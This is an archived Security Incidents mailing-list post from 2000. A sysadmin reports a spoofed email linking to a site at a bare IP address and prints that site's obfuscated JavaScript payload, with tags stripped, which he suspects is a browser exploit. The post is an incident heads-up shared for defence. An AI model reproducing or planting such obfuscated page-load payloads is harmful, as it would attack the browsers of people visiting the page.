Security Incidents mailing list archives

Hostile email


From: mmurray () TAOS COM (mmurray () TAOS COM)
Date: Wed, 12 Jul 2000 08:38:48 -0400


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey all...

        Got an email containing this, this morning [Note: those were HTML tags;
I removed the tags around them, so that it's benign]:
a href="http://209.235.47.178/index.html"/a
a href="http://209.235.47.178/index.html"owwww! my
ass!/a___

        Just so that everybody knows, the subject line of the email is "Is this
Jim?", and it was BCC'd to me.  Sender was a yahoo.com email address with a
reply-to that was at aol.com.  I'm guessing that both were spoofed (although I
haven't bounced yet on either).  Never had a spoofed one with a reply-to; seems
kinda strange.

        Went to the site, and it's a blank site except for a piece of
JavaScript: (source follows, tags removed)

html
script src="_"

/script
script language="Javascript"

!--
function rm(){var
rmt="%%%%%%%%%NNNNN[[[[[NNNa%%%%%%%%%NNNN>[[[[[NNN^%%%%%%%%%NNNNC[[[[[NNNL%%%%%%
%%%NNNN][[[[[NNNW%%%%%%%%%NNNNr[[[[[NNNL%%%%%%%%%NNNNN[[[[[NNNI%%%%%%%%%NNNN#[[[
[[NNN^%%%%%%%%%NNNN9[[[[[NNNB%%%%%%%%%NNNN1[[[[[NNN/%%%%%%%%%NNNN~[[[[[NNN/%%%%%
%%%%NNNNr[[[[[NNNx%%%%%%%%%NNNNN[[[[[NNNN%%%%%%%%%NNNN][[[[[NNNU%%%%%%%%%NNNNP[[
[[[NNNh%%%%%%%%%NNNNr[[[[[NNNe%%%%%%%%%NNNNC[[[[[NNNU%%%%%%%%%NNNNN[[[[[NNNI%%%%
%%%%%NNNNP[[[[[NNN^%%%%%%%%%NNNN,[[[[[NNN\t%%%%%%%%%NNNNN[[[[[NNNU%%%%%%%%%NNNNr
[[[[[NNNT%%%%%%%%%NNNNf[[[[[NNN\t%%%%%%%%%NNNNC[[[[[NNNu%%%%%%%%%NNNNN[[[[[NNNB%
%%%%%%%%NNNNv[[[[[NNNx%%%%%%%%%NNNN7[[[[[NNN|%%%%%%%%%NNNNs[[[[[NNNt%%%%%%%%%NNN
N~[[[[[NNNh%%%%%%%%%NNNN9[[[[[NNNn%%%%%%%%%NNNN<[[{[[NNNU%%%%%%%%%NNNNN[[z[[NNN|
%%%%%%%%%NNNNc[[U[[NNNa%%%%%%%%%NNNN7[[n[[NNN^%%%%%%%%%NNNNP[[d[[NNNL%%%%%%%%%NN
NN,[[N[[NNNW%%%%%%%%%NNNNN[{z[[NNNL%%%%%%%%%NNNN+[+j[[NNNI%%%%%%%%%NNNN7[s&[[NNN
^%%%%%%%%%NNNNs[#U[[NNNB%%%%%%%%%NNNNN[X4[[NNN/%%%%%%%%%NNNN7[CU[[NNNP%%%%%%%%%N
NNN,[Nu[[NNNh%%%%%%%%%NNNN~[]B[[NNNL%%%%%%%%%NNNN`[sx[[NNN\t%%%%%%%%%NNNNN[)\n[[
NNNu%%%%%%%%%NNNNH[BS[[NNN&%%%%%%%%%NNNN;[xS[[NNNu%%%%%%%%%NNNNa[=F[[NNNd%%%%%%%
%[NNNNV[a([[NNNo%%%%%%%%[NNNN@[}+[[NNNL%%%%%%%%[NNNNN[L+[[NNNU%%%%%%%%[NNNNr[ex[
[NNNu%%%%%%%%[NN%N7[4?[[NNN/%%%%%%%%[NN{N9[x%[[NNN.%%%%%%%%[NN}N#[N{[[NNNu%%%%%%
%%[NN\tN`[^$[[NNN\t%%%%%%%%[NNWN<[&z[[NNNL%%%%%%%%[NNnN{[uU[[NNNI%%%%%%%%[NN?N$[
Un[[NNNu%%%%%%%%[NN%Nr[4d[[NNNh%%%%%%%%[NN[NP[4?[[NNNN%%%%%%%%[NN[Nr[t%[[NNNL%%%
%%%%%[NN[N~[h{[[NNNu%%%%%%%%[NN[NC[j$[[NNNI%%%%%%%%[NN[N?[B}[[NNN\t%%%%%%%%[NN[N
%[xL[[NNN.%%%%%%%%[NN[N{[de[[NNNx%%%%%%%%[NN[N$[\t4[[NNN?%%%%%%%%[NN[N}[^?[[NNN{
%%%%%%%%[NN[N\t[x[[[NNNt%%%%%%%%[NN[NW[N[[[NNNe%%%%%%%%[NN[Nn[h[[[NNNj%%%%%%%%[N
N[N?[U[[[NNNN%%%%%%%%[NN[N[{u[[[NNN^%%%%%%%%[NN[NN+\t[[[NNNu%%%%%%%%[NN[NNs^[[[N
NN&%%%%%%%%[NN[NN#t[[[NNNB%%%%%%%%[NN[NNX![[[NNNx%%%%%%%%[NN[NNC\t[[NNNN}%%%%%%%
%[NN[NN]?[[NNNNL%%%%%%%%[NN[NNCN[[NNNNL%%%%%%%%[NN[NNr%[[NNNNo%%%%%%%%[NN[NNN[[[
NNNNY%%%%%%%%[NN[NNs[[[NNNN$%%%%%%%%[NN[NN7[[[NNNN$%%%%%%%%[NN[NNv[[[NNNN|%%%%%%
%%[NN[NN][[[NNNN|%%%%%%%%[NN[NNB[[[NNNN|%%%%%%%%[NN[NNx[[[NNN%a%%%%%%%%[NN[NN;[[
[NNN{u%%%%%%%%[NN[NNS[[[NNNo\t%%%%%%%%[NN[NNS[[[NNN?!%%%%%%%%[NN[NN
[[[NNN-^%%%%%%%%[NN[NNx[[[NNNhU%%%%%%%%[NN[NNN[[[NNNz\\%%%%%%%%[NN[NNz[[[NNN^L%%
%%%%%%[NN[NNU[[[NNNoa%%%%%%%%[NN[NNu[[[NNN.&%%%%%%%%[NN[NNn[[[NNN{U%%%%%%%%[NN[[
N\t[[[NNN$e%%%%%%%%[NN[[Nu[[[NNNo$%%%%%%%%[NN[[NB[[[NNN?t%%%%%%%%[NN[[Nx[[[NNN{e
%%%%%%%%[NN[[NS[[[NNNzW%%%%%%%%[NN[[Nx[[[NNNuj%%%%%%%%[NN[[NN[[[NNN?\t%%%%%%%%[N
N[[Ne[[[NNN{^%%%%%%%%[NN[[NW[[[NNNo$%%%%%%%%[NN[[Nu[[[NNNN\t%%%%%%%%[NN[[Nj[[[NN
NWh%%%%%%%%[NN[[Nt[[[NNN4&%%%%%%%%[NN[[Nh[[[NNNtj%%%%%%%%[NN[[N}[[[NNNjI%%%%%%%%
[NN[[N\t[[[NNNhd%%%%%%%%[NN[[Nt[[[NNNBa%%%%%%%%[NN[[Nj[[[NNNxj%%%%%%%%[NN[[N}[[[
NNN&t%%%%%%%%[NN[[NL[[[NNN\t\\%%%%%%%%[NN[[NB[[[NNNhx%%%%%%%%[NN[[Nx[[[NNNLN%%%%
%%%%[NN[[NS[[[NNN\tW%%%%%%%%[NN[[Nx[[[NNNu4%%%%%%%%[NN[[NN[[[NNNxL%%%%%%%%[NN[[N
e[[[NNN?B%%%%%%%%[NN[[NW[[[NNN{x%%%%%%%%[NN[[Nu[[[NNNW|%%%%%%%%[NN[[[j[[[NNNN|%%
%%%%%%[NN[[[t[[[NNN}|%%%%%%%%[NN[[[h[[[NNNua%%%%%%%%[NN[[[|[[[NNN\ts%%%%%%%%[NN[
[[t[[[NNN\\\t%%%%%%%%[NN[[[n[[[NNNB!%%%%%%%%[NN[[[L[[[NNNx]%%%%%%%%[NN[[[}[[[NNN
}U%%%%%%%%[NN[[[B[[[NNNL\\%%%%%%%%[NN[[[x[[[NNNLL%%%%%%%%[NN[[[S[[[NNNoa%%%%%%%%
[NN[[[x[[[NNNY&%%%%%%%%[NN[[[?[[[NNN$U%%%%%%%%[NN[[[N[[[NNN$e%%%%%%%%[NNN[[[[[[N
NN|x%%%%%%%%[NNN[[[[[[NNN|N%%%%%%%%%NNN[[[[[[NNN|z%%%%%%%%{NNN[[[[[[NNNaU%%%%%%%
%}NNN[[[[[[NNNuu%%%%%%%%LNNN[[[[[[NNN\tn%%%%%%%%eNNN[[[[[[NNN!\t%%%%%%%%4NNN[[[[
[[NNN^u%%%%%%%%?NNN[[[[[[NNNUB%%%%%%%%NNNN[[[[[[NNN\\x%%%%%%%%NNNN[[[[[[NNNLS%%%
%%%%%NNNN[[[[[[NNNax%%%%%%%%NNNN[[[[[[NNN&N%%%%%%%%NNNN[[[[[[NNNU|%%%%%%%%NNNN[[
[[[[NNNet%%%%%%%%NNNN[[[[[[NNN$n%%%%%%%%NNNN[[[[[[NNN\tL%%%%%%%%NNNN[[[[[[NNNh}%
%%%%%%%NNNN[[[[[[NNNLB%%%%%%%%NNNN[[[[[[NNN\tx%%%%%%%%NNNN[[[[[[NNNu\"%%%%%%%%NN
NN[[[[[[NNNa\"%%%%%%%%NNNN[[[[[[NNN}x%%%%%%%%NNNN[[[[[[NNNLN%%%%%%%%NNNN[[[[[[NN
Ne}%%%%%%%%NNNN[[[[[[NNN4\t%%%%%%%%NNNN[[[[[[NNNxt%%%%%%%%NNNN[[[[[[NNNNj%%%%%%%
%NNNN[[[[[[NNNU}%%%%%%%%NNNN{[[[[[NNNhL%%%%%%%%NNNNr[[[[[NNNeB%%%%%%%%NNNNP[[[[[
NNNUx%%%%%%%%NNNNr[[[[[NNNI\"%%%%%%%%NNNN~[[[[[NNN^@%%%%%%%%NNNNC[[[[[NNN\tx%%%%
%%%%NNNN?[[[[[NNNU?%%%%%%%%NNNN,[[[[[NNNI{%%%%%%%%NNNN#[[[[[NNNL$%%%%%%%%NNNNX[[
[[[NNNBW%%%%%%%%NNNNC[[[[[NNNx?%%%%%%%%NNNN9[[[[[NNN^{%%%%%%%%NNNNN[[[[[NNN\t$%%
%%%%%%NNNNr[[[[[NNN4o%%%%%%%%NNNNf[[[[[NNN\\?%%%%%%%%NNNNC[[[[[",rmv=1,rms=966,r
mr=46;document.write((rmo)((rmt),(rms),(rmr),(rmv)));}(rm());
//--

/script
/html

        As I read this, it looks like it's designed to overflow a buffer in the
browser.  Best guess is that it exploits a vulnerability in IE 5, but I haven't
proved that yet (I'm currently on a Linux box that was NOT vulnerable).

        Anybody back me up on the theory?  Anybody else seen this?  Just thought
I'd put out a heads-up...

                                Mike

___________________________________________________________
Mike Murray                             mmurray () taos com
System and Network Administrator
Taos -- The Sys Admin Company
San Francisco, CA

pager: 415-253-2786

___________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2

iQA/AwUBOWxm1R93UCkjW5r0EQJmLACg6HRpX6ftJNwSB69hhz4Ibm3/F3gAnRT5
NvjPz3NNZxupcNqcGMukm5P2
=Axih
-----END PGP SIGNATURE-----

